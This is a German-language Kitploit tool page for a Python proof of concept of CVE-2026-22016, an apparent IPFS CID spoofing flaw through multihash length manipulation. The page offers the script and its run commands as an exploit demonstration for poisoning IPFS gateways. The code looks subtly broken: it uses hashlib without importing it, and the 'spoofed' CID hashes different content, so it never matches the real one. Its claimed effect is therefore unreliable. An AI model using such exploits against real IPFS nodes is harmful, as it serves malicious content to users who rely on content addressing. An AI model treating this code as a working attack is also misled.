Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-22016-IPFS-CID-Spoofing-via-Multihash-Length-Extension — Python-Proof-of-Concept, das IPFS-CID-Spoofing mittels Multihash-Längenerweiterung demonstriert und Schwachstellen in der Content-Adressierungs-Verifikation aufzeigt, die IPFS-Gateways vergiften können. | Kitploit
Tools/GitHubGitHub/george0papasotiriou/cve-2026-22016-ipfs-cid-spoofing-via-multihash-length-extension
SchwachstellenanalyseExploitationHash-AnalyseWebsicherheitKryptographieAdversarial-Angriff
GitHubgeorge0papasotiriou/cve-2026-22016-ipfs-cid-spoofing-via-multihash-length-extension

CVE-2026-22016-IPFS-CID-Spoofing-via-Multihash-Length-Extension

Python-Proof-of-Concept, das IPFS-CID-Spoofing mittels Multihash-Längenerweiterung demonstriert und Schwachstellen in der Content-Adressierungs-Verifikation aufzeigt, die IPFS-Gateways vergiften können.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 15 TagenNoch nicht geprüft

CVE-2026-22016 – IPFS-CID-Spoofing über Multihash-Längenverlängerung

Programmcode (Python)

root@kitploit:~
# ipfs_cid_spoof.py - Generates a CID with a different multihash length
import multihash, cid
# Attacker creates a file whose hash, when truncated, matches a different file's prefix
original_content = b"hello"
fake_content = b"hello world"
real_cid = cid.make_cid(1, 'dag-pb', multihash.encode(hashlib.sha256(original_content).digest(), 'sha2-256'))
# Spoofed CID: we can craft a multihash with a shorter length that matches the start of the real one
spoofed_multihash = multihash.encode(hashlib.sha256(fake_content).digest()[:16], 'sha2-256', length=16)
spoofed_cid = cid.make_cid(1, 'dag-pb', spoofed_multihash)
print(f"Real CID: {real_cid}")
print(f"Spoofed CID: {spoofed_cid}")
# If IPFS node only checks prefix, it may serve the wrong content.

CVE-2026-22016 – IPFS-CID-Spoofing über Multihash-Längenverlängerung

Severity: High

Übersicht

Eine IPFS-Implementierung vertraut dem Längenfeld im Multihash einer CID, ohne zu überprüfen, ob der Hash selbst mit dem vollständigen Inhalt übereinstimmt. Ein Angreifer kann eine Datei erstellen, deren abgeschnittener Hash dem Präfix des Hashs einer legitimen Datei entspricht, und die schädliche Datei unter derselben CID ausliefern.

Details zur Schwachstelle

  • Typ: Content-Spoofing
  • Auswirkung: Ausliefern schädlicher Inhalte, Vergiften von IPFS-Gateways.
  • Grundursache: Die CID-Verifizierung überprüft nicht, ob die Digest-Länge der erwarteten Ausgabe der Hash-Funktion entspricht.

Exploit-Demonstration

Führen Sie das Skript aus:

root@kitploit:~
pip install py-multihash py-cid
python ipfs_cid_spoof.py

Es zeigt, dass eine gefälschte CID erzeugt werden kann.

Tool herunterladen